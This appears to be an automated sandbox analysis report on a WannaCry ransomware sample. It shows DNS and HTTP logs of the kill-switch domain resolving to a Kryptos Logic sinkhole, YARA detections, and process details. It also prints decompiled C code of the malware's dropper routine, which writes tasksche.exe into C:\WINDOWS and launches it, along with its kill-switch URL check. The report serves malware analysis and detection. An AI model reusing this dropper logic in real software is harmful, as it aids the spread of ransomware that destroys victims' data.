May 8, 2023 05:37:46.111607075 CEST	140.174.21.18	192.168.2.6	5306	(Net unreachable)	Destination Unreachable
May 8, 2023 05:37:47.136049986 CEST	94.152.196.183	192.168.2.6	e31a	(Unknown)	Destination Unreachable
May 8, 2023 05:37:50.151130915 CEST	94.152.196.183	192.168.2.6	e31a	(Unknown)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 8, 2023 05:35:38.893922091 CEST	192.168.2.6	8.8.8.8	0x4d4	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false
May 8, 2023 05:35:39.859180927 CEST	192.168.2.6	8.8.8.8	0x6389	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 8, 2023 05:35:38.928792953 CEST	8.8.8.8	192.168.2.6	0x4d4	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	A (IP address)	IN (0x0001)	false
May 8, 2023 05:35:38.928792953 CEST	8.8.8.8	192.168.2.6	0x4d4	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.17.244.81	A (IP address)	IN (0x0001)	false
May 8, 2023 05:35:39.885539055 CEST	8.8.8.8	192.168.2.6	0x6389	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	A (IP address)	IN (0x0001)	false
May 8, 2023 05:35:39.885539055 CEST	8.8.8.8	192.168.2.6	0x6389	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.17.244.81	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49704	104.16.173.80	80	C:\Users\user\Desktop\stN592INV6.exe

Timestamp	kBytes transferred	Direction	Data
May 8, 2023 05:35:38.979065895 CEST	91	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	104.16.173.80	80	192.168.2.6	49704	C:\Users\user\Desktop\stN592INV6.exe

Timestamp	kBytes transferred	Direction	Data
May 8, 2023 05:35:39.010205984 CEST	92	IN	HTTP/1.1 200 OK Date: Mon, 08 May 2023 03:35:38 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 7c3ea7649c729b63-FRA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49705	104.16.173.80	80	C:\Users\user\Desktop\stN592INV6.exe

Timestamp	kBytes transferred	Direction	Data
May 8, 2023 05:35:39.911845922 CEST	93	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	104.16.173.80	80	192.168.2.6	49705	C:\Users\user\Desktop\stN592INV6.exe

Timestamp	kBytes transferred	Direction	Data
May 8, 2023 05:35:39.944324017 CEST	94	IN	HTTP/1.1 200 OK Date: Mon, 08 May 2023 03:35:39 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 7c3ea76a6c8b371f-FRA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: stN592INV6.exePID: 7116, Parent PID: 3452

General

Target ID:	0
Start time:	05:35:37
Start date:	08/05/2023
Path:	C:\Users\user\Desktop\stN592INV6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\stN592INV6.exe
Imagebase:	0x400000
File size:	3751936 bytes
MD5 hash:	31510BD9B6F5C297C64492AB86AACAA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: stN592INV6.exePID: 6052, Parent PID: 576

General

Target ID:	1
Start time:	05:35:38
Start date:	08/05/2023
Path:	C:\Users\user\Desktop\stN592INV6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\stN592INV6.exe -m security
Imagebase:	0x400000
File size:	3751936 bytes
MD5 hash:	31510BD9B6F5C297C64492AB86AACAA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.353120233.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: tasksche.exePID: 2396, Parent PID: 7116

General

Target ID:	2
Start time:	05:35:39
Start date:	08/05/2023
Path:	C:\Windows\tasksche.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\tasksche.exe /i
Imagebase:	0x400000
File size:	3514368 bytes
MD5 hash:	7F7CCAA16FB15EB1C7399D422F8363E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly) Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 98%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: stN592INV6.exePID: 7116, Parent PID: 3452COMMON

Executed Functions

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x746af7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x746afc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e43
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebc
0x00407ed3
0x00407edb
0x00407ee0
0x00407ee8
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F56FB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C
CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
CreateProcessA.KERNELBASE ref: 00407EE8
CloseHandle.KERNEL32(00000000), ref: 00407EF7
CloseHandle.KERNEL32(08000000), ref: 00407F02

Strings

CreateProcessA, xrefs: 00407D07
/i, xrefs: 00407E8D
D, xrefs: 00407ED3
CloseHandle, xrefs: 00407D29
WriteFile, xrefs: 00407D1C
CreateFileA, xrefs: 00407D0F
WINDOWS, xrefs: 00407DF2, 00407E0D
C:\%s\qeriuwjhrf, xrefs: 00407E12
tasksche.exe, xrefs: 00407DEA
kernel32.dll, xrefs: 00407CEA
C:\%s\%s, xrefs: 00407DFB

Memory Dump Source

Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 1541710770-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

0x00409a19
0x00409a1b
0x00409a20
0x00409a2b
0x00409a2c
0x00409a39
0x00409a3e
0x00409a43
0x00409a4a
0x00409a51
0x00409a64
0x00409a72
0x00409a7b
0x00409a80
0x00409a85
0x00409a8b
0x00409a92
0x00409a98
0x00409a99
0x00409a9e
0x00409aa3
0x00409aa8
0x00409ab2
0x00409acb
0x00409ad1
0x00409ad6
0x00409adb
0x00409ae8
0x00409aea
0x00409af0
0x00409b2c
0x00409b31
0x00409b32
0x00409b32
0x00409af2
0x00409af2
0x00409af2
0x00409af3
0x00409af6
0x00409af8
0x00409b03
0x00409b05
0x00409b05
0x00409b06
0x00409b06
0x00409b03
0x00409b09
0x00409b0d
0x00000000
0x00000000
0x00409b13
0x00409b1a
0x00409b24
0x00409b39
0x00409b26
0x00409b26
0x00409b26
0x00409b3a
0x00409b3b
0x00409b3c
0x00409b44
0x00409b45
0x00409b4a
0x00409b4e
0x00409b54
0x00409b59
0x00409b5b
0x00409b5e
0x00409b5f
0x00409b60
0x00409b67

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.KERNELBASE ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				_push(_t27);
				InternetCloseHandle(); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x0040819c
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
